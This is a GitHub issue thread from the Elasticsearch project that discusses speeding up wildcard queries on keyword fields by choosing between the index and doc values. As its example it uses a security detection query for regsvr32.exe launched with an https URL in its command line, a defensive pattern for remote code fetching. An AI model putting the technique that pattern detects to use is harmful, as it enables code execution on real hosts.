elastic / elasticsearch

Free and Open Source, Distributed, RESTful Search Engine
https://www.elastic.co/products/elasticsearch
Other
69.92k stars 24.73k forks source link

Query planning for wildcard queries with keyword fields #70612

Open rw-access opened 3 years ago

rw-access commented 3 years ago

Wildcard queries are pretty common but often come at a performance cost. Although the new wildcard data type is optimized for search speed of high cardinality fields, recent findings have shown that it can come at a cost of ingest speed and index size.

I think there's another option to optimize search speed of wildcard queries on keyword fields, without increasing the ingest cost. Knowing when to search the index vs using docvalues on a limited set of results might lead to better search time.

Wildcard queries are unavoidable in some domains or solutions, like security. They can be a sore spot, so improvements here could have a major positive impact.

For example, here's one KQL query that could be done faster with docvalues:

event.category : process and process.name : regsvr32.exe and process.command_line : *https\:*//*

Rationale/heuristic:

Complexities:

Possible approaches:

I will defer to the experts @markharwood @jpountz to decide and figure out what's best. My understanding of low-level details here is looking limited, so please don't take my suggestions too literally. Whatever approach is best, I do think that improving wildcard search speed would add significant value to our users, without significant cost.

Links This is a similar approach to range query planning, as was done in https://www.elastic.co/blog/better-query-planning-for-range-queries-in-elasticsearch

elasticmachine commented 3 years ago

Pinging @elastic/es-perf (Team:Performance)

jpountz commented 3 years ago

How do we estimate the number of documents matching regsvr32.exe? Do we need stats?

Actually we have these stats already in the inverted index, called "document frequency", and this is generalized across all queries, which by contract must be able to provide an estimate of their number of matches, called "cost". We use these costs today in order to figure out the best order to evaluate clauses in conjunctive boolean queries, from the one that has the lowest number of matches to the one that has the greatest number of matches.

Let me share some additional context.

On wildcard fields, wildcard/regexp queries are generally parsed as the conjunction between a fast approximation based on substrings that can be extracted from the query, and a slow veryfication using doc values. I expect these queries to run rather efficiently, including when intersected with highly-selective clauses.

Keyword fields are harder because they don't directly give access from documents to values, there is an indirection where documents are associated with ordinals, which uniquely identify terms in the terms dictionary of the field. This gives us two strategies for running doc values against keyword fields:

The most common performance penalty with regexp/wildcard queries comes from the up-front cost of evaluating all terms of the terms dictionary against the query (even though this is done in an optimized way), so we'd need to use the latter approach.

I think that your idea to use the field cardinality as a metric for the cost of the wildcard/regexp query is a good one, and like you guessed, the hard work will be to figure out a good factor to decide whether we should use the index or doc values to run the query

elasticmachine commented 3 years ago

Pinging @elastic/es-search (Team:Search)

elasticsearchmachine commented 3 months ago

Pinging @elastic/es-search-relevance (Team:Search Relevance)